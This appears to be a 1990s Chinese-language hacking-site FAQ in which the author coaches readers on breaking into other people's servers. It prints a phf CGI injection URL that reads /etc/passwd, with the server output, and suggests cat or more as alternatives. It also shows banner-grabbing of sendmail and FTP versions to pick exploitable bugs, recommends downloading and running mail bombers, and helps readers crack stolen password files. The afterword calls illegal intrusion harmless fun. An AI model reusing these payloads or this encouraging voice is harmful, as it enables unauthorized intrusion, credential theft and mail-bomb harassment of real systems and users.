难讲啦, 谁晓得他们目录命名的方式,都是随人家高兴的嘛~~
不过像你所讲的, 把这种 Bug 写成程式来抓 passwd 档, 那是不是要针对很多版本的
sendmail 都要有判断? 再针对每个版本送出不同的指令? 如果真的可以写出来这样的程
式的话, 那一定是很不错, 不过这应该还只是一个理想吧?? 俞兄如果有写好的, 请寄送
一份给小弟, 我倒想看看程式可以强到甚么程度. 还有, 并不是每个 sendmail Bug 都
是连上 smtp 就可以作了, 有些还要写一些小程式 (Scripts) 才跑才有用, 也就是说你
必需要有一个 login 到该 server 的帐号才行.... 所以..... 难说啦!
[Q8]
I already download avalanche v2.8 mail bomber,but I can't send it! When I
start send the bomb massage,why always receive 553 error ot other error?
can you help me how to seng it!
[A8]
有些 MailBomb 我并没有实际的测试过, 因为种类实在太多了, 现在好像越来越多人喜
欢写这种程式, 如果你有类似的问题, 可以到我们首页上的留言版发问, 相信有用过的
网友会提供你一些设定上的建议, 让你的程式能够正常的运作.
[Q9]
Hi, I read your hack homepage, it's very good. Do you know any BBS or sites
about system security & hacking? They are always underground, I can't find
them.Thanks alot.
[A9]
目前中文的 Hack Homepage 大多都是关於软体注册码的网站, 有些网站现在也会提供一
些关於破解主机方面的资讯, 我们将在首页上建立一些网页的连结点, 让网友们可以到
其它的网站上看看其它的破解资讯, 如果你有建立一个相关的网页的话, 请写信给我,
我会将你的网页加入我们站上的连结. 至於 bbs 的话, 各大专院校的 bbs 应该都有
Hacker 区的讨论, 目前国内以交大资工的 Hacker 区资料最为丰富, 你有空也可以上去
看看. bbs.cis.nctu.edu.tw
[Q10]
很冒昧的打扰你,小弟拜读你的大作中 coolhk2 时,便实地的操练了一下,当小弟在浏
览器中下达∶
http://xxxxxx/cgi-bin/nph-test-cgi?*
後,诚如你所说的一份报表出来如下∶
CGI/1.0 test script report:
argc is 1. argv is \*.
SERVER_SOFTWARE = Apache/1.0.0
SERVER_NAME = auto.nypi.edu.tw
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/1.0
SERVER_PORT = 80
REQUEST_METHOD = GET
HTTP_ACCEPT = image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,*/*
PATH_INFO =
PATH_TRANSLATED =
SCRIPT_NAME = /cgi-bin/nph-test-cgi
QUERY_STRING = 2 Count.cgi acc acc.c archie calendar count date discuss
doit.cgi dopost.c
finger fortune guestmsg guestmsg.c imagemap jj move.pl nph-count
nph-test-cgi phf post-query
post.c query ranking re.c repost.c repost.c.bak test-cgi test-cgi.tcl uptime
vote.pl wais.pl
REMOTE_HOST = 140.130.1.218
REMOTE_ADDR = 140.130.1.218
REMOTE_USER =
CONTENT_TYPE =
CONTENT_LENGTH =
但是当小弟再接著输入∶
http://xxxxxxxx/cgi-bin/phf?Qalias=x%0aless%20/etc/passwd
可是却没有 passwd 出现,仅出现如下∶
Ⅰ.
Server Error
The server encountered an internal error or misconfiguration and
was unable to complete your request.
Please contact the server administrator, allen@auto.nypi.edu.tw and
inFORM them of the time the error occurred, and anything you might have
done that may have caused the error.
Ⅱ.
Query Results
/usr/local/bin/ph -m alias=x less /etc/passwd
上面的 Ⅰ及Ⅱ 是小弟分别在不同的站所试出的结果,请问一下为什么会如
此呢,是不是小弟指令下错了或者是该站的软体已经把 bug 给 patch 过了
,谢谢你!
[A10]
正如你所说, 可能这个站台已经把他们的 httpd Patch 过了, 所以没有办法拿到, 也不
一定要用 less 指令, 也可以用 more, cat 等指令来试看看, 你上面所下的指令应该都
正确才对,如果真是已经 Patch 过了的话, 就只好试试看系统有没有其它的漏洞罗.
这个漏洞主要是系统所提供的 phf 的 bug, 有些主机在 test-cgi 的 Report 上的 Query
String 那一行没有 phf, 也就表示这台主机没有提供 phf 这个 cgi 让你使用, 也就没
有办法用这个方式来取得 passwd 档了.
[Q11]
1. Can you tell me how to find the KOS file by YAHOO.The best of idle is
tell
me the FTP site.Thank you.
2.我给您发完信后,想从您的首页上拉个CJACK14下来,发现上面好象没有耶 我点取了
那个名字,可是报告说没有这个文件。 (~~~~~~~~~~~~不会是没有吧
[A11]
你现在已经可以在 ftp.cads.com.tw/pub/security 中拿到这个档, 这是由网友 Robin
所提供的ftp, 站台上许多程式都可以在这里抓到. 如果你在我们站台上抓不下来, 请到
这里试试, 如果你想在 Yahoo 上找的话, 寻找 globalkos 这个关键字, 可以顺便连到
国外的站台看看他们摆了哪些东西, 亦可顺便学点东西喔~~
[Q12]
Can you tell me how to check infomation of host? How to know the FTP server
and MAIL server?
[A12]
对, 有很多网友来信询问如何破解某某站台, 如何破解.... 都没有顺便说明一下你们想
破解的系统是属於哪种系统, 先教大家看一下系统名称, 你只要 telnet 进入, 当 Unix
提示符号出现的时候, 用 uname -svrmn 就可以看到了, 各选项代表的意义如下说明:
-s: Show System Name, -v: Show Operating Version, -r: Reveals The Software
Release Level
-m: Identifies The Machine Hardware For You -n:The node name of the computer
is revealed
另外再来说明一下如何看 Sendmail 版本, 我们只要连到 Port 25 就可以看到了, 如:
telnet ms1.xxxxxxxxx.xxx.tw 25
220 ms1.xxxxxxxxx.xxx.tw Sendmail 5.65v3.2 (1.1.8.2/30May97-0801PM) Fri, 6
Jun 1
997 11:38:23 +0800
至於 ftp 呢? 你只要连上 ftp 就应该会在画面上看到他的版本名称了, 如:
C:\WINDOWS>ftp ftp.xxxxxxxxx.xxx.tw
Connected to ftp.xxxxxxxxx.xxx.tw.
220-Serv-U FTP-Server v2.2 for WinSock ready...
220-Welcome to xxxxxxxxxxxx xxx Ftp Server(ftp.xxxxxxxxx.xxx.tw).
220-From xxx.xx.xxx.xx
[Q13]
请问你能否告诉我如何制造mail bomb,因为最近老是收到广告信或者有的没有的,实在很
讨厌.
[A13]
首页上有一堆Mail Bomb 的程式, 你需要的只是把他们抓下来, 然後在电脑上跑就行了,
当然里面也都有说明档之类的文件. 在收到广告信件的时候, 请不要一昧的回信, 因为
有些发 MailList 的人, 对系统的运作并不 解, 有时可能是利用在帐号目录设 .foward
的方式来发信的, 而信件中的 Reply to: 栏位填的也是该帐号, 当遇到这种情况的时候,
你所发的信会让所有在这个 MailList 的人都收到, 如果所有的收件人都回这封信的话,
那你的信箱一定就爆烂了! 所以要先冷静的分析一下这封信的发法, 会不会伤害到别人,
再决定要怎么办, 千万别乱炸!~ MailBomb 也会害到自己的, 切记~
[Q14]
您好!我是XXXXXXXXXXXXXXXXX!!对於您写的TXT2DIC 有一点问题!为什么所建的密
码档PASSDICT不会增加!只是每增加一次字典,PASSDICT会随著不同!
[A14]
TXT2DIC 的产生方式会覆盖掉旧有的档案, 所以请在使用的时候使用不同的档案名称,
目前最新的 TXT2DIC V1.2 也还没有使用 File Append 的方式, 所以仍然会将旧档案覆
盖, 若你不想覆盖旧档, 请使用不同的档名来进行转换! 否则程式将不会给你任何的警
告就把档案盖下去了!
[Q15]
在网路闲逛时发现FETAG Software's Hacking Page像发现宝一样的下载了Coolhc#1-6,
在以前电影、小说所描述的骇客情节,以为只有在外国才有的事,想不到在台湾已有人
在这片领域默默的耕耘,虽然我不是很聪明但还是很有兴趣的想出点力。拜读你的大作
似乎有点意犹未尽,想请教你什么时候再出第七集,坊间有什么中文的入门书可参考的
。还有想当一个骇客族会不会很难。
[A15]
谢谢你的鼓励, 7 跟 6 之间的确是隔了很久, 且这一篇也没有讲到甚么东西, 有点对不
起大家的等待了. 若想要学入侵, 希望各位能多看一看 Unix 方面的书, 先将 Unix 的指
令读熟, 最基本的当然就是 Shell 指令, 再来就是学著写一些简单的 Shell Script,
若没有馀力自己找系统的漏洞, 又想要破解站台, 建议要多看看一些系统安全的 Mail
List, (好多老话重谈), 这一篇就针对 Mail List 的部份, 有简单的介绍, 让大家对这
些系统安全的 Mail List 有些 解, 进而多吸收一些知识.
[Q16]
我想请问一下,我是用Browser抓/etc/passwd的, 面root的密码是被编过码的吗?
我用Crack Jack 1.4解码。但是好像不行,到底要用什么解才对,一下用Crack Jack,一
下又用Brute,我都看不懂,还有就是UltraEdit是什么?Pass2Dic有用吗?还有我用
NetTerm 4.1版for win31可是ftp or sendmail好像都进不去,是什么原因呢?另外就是
我用CuteFtp 1.8版,Login设anonymous or Double,ID和passwd都空白,但是为什么就
可以进Ftp,然後用NetTerm却进不去? 还有KOS(1.?M)的不会用。
[A16]
好多问题喔~ 我一一的简短回答:[1]要看 Passwd 是否是编码过的, 在 CoolHC#1 中就有
说明, 我没有亲眼看到 passwd 档, 没有办法回答. [2]CrackJack 跟 Brute 都是功能相
同的程式, CrackJack 速度比较快, 请你先看一下 CoolHC1~6 之後再发问, 因为有很多
东西都是写过的了! [3]UltraEdit??? 文书编辑程式, 我用它来写 Home Page [4]Pass2Dic
在 CJack 上已经有选项了, 但是在 Brute 之类的成式上就用得到. [5]ftp 有提供匿名
登入, 但是在 Telnet 没有, 所以无法登入. [6] KOS 的用法也写过了!
[Q17]
when i use txt2dic.exe , i can't use it first, when i go into the third step
it show " incorrect dos version....done!" secondly, when i gp into the
fourth
step , it show" have some error on code-62 "what's wrong ?
[A17]
第一个问题, 在第三步骤发生 Incorrect dos version, 你用的是 1.0 版, 所以需要呼
叫到 dos 的 sort 程式, 请使用 1.2 版 (For Win32 only) 就不会有此状况了! 二,你
发生 Error 62 的状况, 这在上一次的 FAQ 中也有讲过了, 请去翻一翻就 解了! 不过
这个状况也在 1.2 版改进了, 所以建议还是用新的版本, 就不会有这种状况发生了!
[Q18]
When I get a passwd file which is shadowed....Please tell me how to do....
[A18]
如果我跟你讲, 无解呢?? 有些 shadow 过的档, 只要你有办法抓到另外一个 shadow 档
是有办法解开的, 但是单要使用 shadow 过的档, 我不相信有人能够解开~ 所以还是要抓
到另一个来 "配对" 才有用! 至於如何抓到 shadow? 很多人都有这样的问题, 那就要看
系统 "提供" 的漏洞多不多了, 不然它 shadow 也就没有意义罗!
[Q19]
First of all, I'd like to give you some feedbacks about your page.
I'm not in Vancouver. I always encounter the slow transfer rate with many
Taiwanese sites. I only got 30 bytes/sec with your site. I don't know the
reason... Anyway, you are the first Chinese hacking page I've ever seen.
I like that. I just want to learn more. Could yu give me some Chinese
hacking
pages' addresses? I will be glad to visit them. By the way, I'm not
interseted
in emailbombs, because they hurt others. But I'm interested in defensing and
cracking emailbombs. I hope you can update your page oftenly. Thanks a lot!
[A19]
谢谢你, 我们会尽量的更新我们的网页, 至於其它中文的类似站台??? 呜... 你们在哪
里呀?? 快点现身吧!! 如果大家有找到新的类似站台的话, 寄得赶快写信来告诉我呦~
[Q20]
请问我ISP的OS是SunOS5.4,我用贵站上的方法不好用了,用贵站关于shadow的link上提
到的也不成了,要如何取得其shadow过的passwd呢?请赐教,多谢!
[A20]
喔~~ 对了! 刚才忘了讲, 如果各位已经试过几个 Port, 解自己系统的版本编号, 使用
的 Sendmail 版本, ftp 版本等的话, 你们可以到 http://underground.org 去看看, 点
选左边那个 Bugs, 然後选一下你所知道的系统, 他会列出一些目前所知的 Bugs 出来, 然
候你就可以依样画葫芦啦, 不过那些讯息都是英文的啦~~
-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
**** 後语 ****
我作这份东西的动机是 "兴趣", 入侵到他人的主机是属於非法的行为? 但是我并没有作
任何的破坏动作, 纯粹就是 "好玩", 当然也因此突显出许多站台的安全性问题, 所以这
份文章也就有点"教育"这些破站台的意味存在. 有许多的网友对 CoolFire 充满了信心,
寄了许多站台的网址来 "求破", 呵.. 我只能看看, 不能够将每天的心力都投注在上面,
网友们也许比较有时间吧!! 大家可以一起到 Hacker 论坛讨论讨论